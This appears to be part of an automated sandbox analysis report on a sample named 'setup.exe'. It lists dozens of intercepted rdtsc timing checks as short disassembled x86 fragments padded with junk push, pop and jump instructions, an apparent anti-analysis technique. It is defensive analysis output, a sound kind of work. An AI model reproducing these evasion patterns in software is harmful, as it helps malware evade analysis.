Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4A265 second address: E4A280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B22h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E496BA second address: E496CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FE0B4F44DC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d jl 00007FE0B4F44DC6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E49817 second address: E4984A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FE0B4522B2Ch 0x0000000f jmp 00007FE0B4522B26h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4984A second address: E4986D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jo 00007FE0B4F44DC6h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E499D2 second address: E499F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE0B4522B21h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007FE0B4522B1Eh 0x00000011 jg 00007FE0B4522B16h 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E499F9 second address: E49A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DCAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4C924 second address: E4C93A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4C93A second address: E4C94D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DCEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4C9A9 second address: E4C9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4C9AE second address: E4C9DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DD1h 0x00000008 jg 00007FE0B4F44DC6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FE0B4F44DD1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4C9DF second address: E4C9E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4C9E6 second address: E4CA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dx, 3EE4h 0x0000000c push 00000000h 0x0000000e mov edx, dword ptr [ebp+122D3A9Eh] 0x00000014 jnl 00007FE0B4F44DD0h 0x0000001a push D9332C49h 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 jnp 00007FE0B4F44DC6h 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4CBBF second address: E4CBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4CBCB second address: E4CBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4CC32 second address: E4CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1BC3h], eax 0x00000011 or di, 0107h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D3801h], ecx 0x0000001e push 836EBDB3h 0x00000023 push eax 0x00000024 push edx 0x00000025 jo 00007FE0B4522B1Ch 0x0000002b ja 00007FE0B4522B16h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4CC63 second address: E4CC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4CC6A second address: E4CCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 7C9142CDh 0x0000000e mov dword ptr [ebp+122D1C93h], edi 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D38F6h] 0x0000001c call 00007FE0B4522B27h 0x00000021 ja 00007FE0B4522B1Ch 0x00000027 mov edi, dword ptr [ebp+122D39DAh] 0x0000002d pop edx 0x0000002e push 00000000h 0x00000030 add dword ptr [ebp+122D3801h], edx 0x00000036 push 00000003h 0x00000038 jne 00007FE0B4522B1Ch 0x0000003e push 7A6F6830h 0x00000043 pushad 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4CCC9 second address: E4CD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD5h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 add dword ptr [esp], 459097D0h 0x00000018 mov edx, dword ptr [ebp+122D38C2h] 0x0000001e lea ebx, dword ptr [ebp+1246188Ah] 0x00000024 sub dword ptr [ebp+122D1CC7h], ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E5EF42 second address: E5EF5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FE0B4522B1Eh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6B889 second address: E6B8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FE0B4F44DCEh 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007FE0B4F44DD3h 0x00000015 popad 0x00000016 push ebx 0x00000017 push esi 0x00000018 jp 00007FE0B4F44DC6h 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6B8C5 second address: E6B8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6BBB3 second address: E6BBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6BBB9 second address: E6BBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6BBBD second address: E6BBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6BD07 second address: E6BD20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 jng 00007FE0B4522B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6BFCB second address: E6BFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE0B4F44DCBh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop ebx 0x0000000f jnc 00007FE0B4F44DE8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6BFEC second address: E6BFFE instructions: 0x00000000 rdtsc 0x00000002 js 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FE0B4522B16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6BFFE second address: E6C002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6C11D second address: E6C13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE0B4522B16h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE0B4522B22h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6C2F7 second address: E6C302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE0B4F44DC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6C302 second address: E6C31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4522B22h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6C5A7 second address: E6C5B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FE0B4F44DC6h 0x00000009 jl 00007FE0B4F44DC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E34479 second address: E3447D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3447D second address: E34483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6CB59 second address: E6CB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6CB5D second address: E6CB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DCDh 0x00000008 jc 00007FE0B4F44DC6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6D0DB second address: E6D10C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE0B4522B16h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE0B4522B28h 0x00000014 jmp 00007FE0B4522B1Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6D10C second address: E6D112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6D112 second address: E6D116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6D4DE second address: E6D4E8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE0B4F44DCEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6D4E8 second address: E6D549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE0B4522B26h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jc 00007FE0B4522B22h 0x00000014 jmp 00007FE0B4522B1Ch 0x00000019 push esi 0x0000001a jmp 00007FE0B4522B27h 0x0000001f pop esi 0x00000020 pushad 0x00000021 jmp 00007FE0B4522B24h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6D7EA second address: E6D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE0B4F44DC6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6D7F7 second address: E6D7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E70CE1 second address: E70CE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E70CE6 second address: E70D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007FE0B4522B2Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007FE0B4522B28h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jo 00007FE0B4522B1Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E70D31 second address: E70D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DCCh 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FE0B4F44DCCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E6FBB9 second address: E6FBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E70E1A second address: E70E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E777CA second address: E777D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E777D0 second address: E777D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E77950 second address: E77954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E77A9E second address: E77AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DCFh 0x00000009 js 00007FE0B4F44DC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E77AB7 second address: E77AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E77AC1 second address: E77ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE0B4F44DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E77ACB second address: E77ADF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E77ADF second address: E77AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E77AE3 second address: E77AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E77AE9 second address: E77AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7801D second address: E78021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E78021 second address: E78052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD3h 0x00000007 pushad 0x00000008 jmp 00007FE0B4F44DD7h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E78052 second address: E78058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E782EA second address: E78309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FE0B4F44DC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E79E76 second address: E79E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E79F53 second address: E79F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E79F57 second address: E79F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7A043 second address: E7A049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7A049 second address: E7A04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7A5C9 second address: E7A5D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE0B4F44DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7A5D3 second address: E7A5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7A5D9 second address: E7A5DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7A7C6 second address: E7A7E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7AE9D second address: E7AF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FE0B4F44DC8h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FE0B4F44DCEh 0x00000016 nop 0x00000017 mov edi, 5D98FFADh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FE0B4F44DC8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1E14h], esi 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 jmp 00007FE0B4F44DCCh 0x00000047 jp 00007FE0B4F44DCCh 0x0000004d jnc 00007FE0B4F44DC6h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7B954 second address: E7B958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7B958 second address: E7B95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7B95C second address: E7B962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7C8F5 second address: E7C90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE0B4F44DD0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7D412 second address: E7D418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7D1D3 second address: E7D1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7EB1F second address: E7EB88 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FE0B4522B18h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FE0B4522B18h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov esi, 5F741A67h 0x00000046 push 00000000h 0x00000048 pushad 0x00000049 sub dx, 3DC2h 0x0000004e or ecx, dword ptr [ebp+1247ABB6h] 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7DE01 second address: E7DE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7E869 second address: E7E86F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7EB88 second address: E7EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7DE05 second address: E7DE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7F65C second address: E7F660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7F364 second address: E7F368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E8469E second address: E846C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FE0B4F44DD8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E846C1 second address: E846D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4522B21h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E846D7 second address: E846E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E393B9 second address: E393BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E393BF second address: E393E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FE0B4F44DCEh 0x00000011 rdtsc
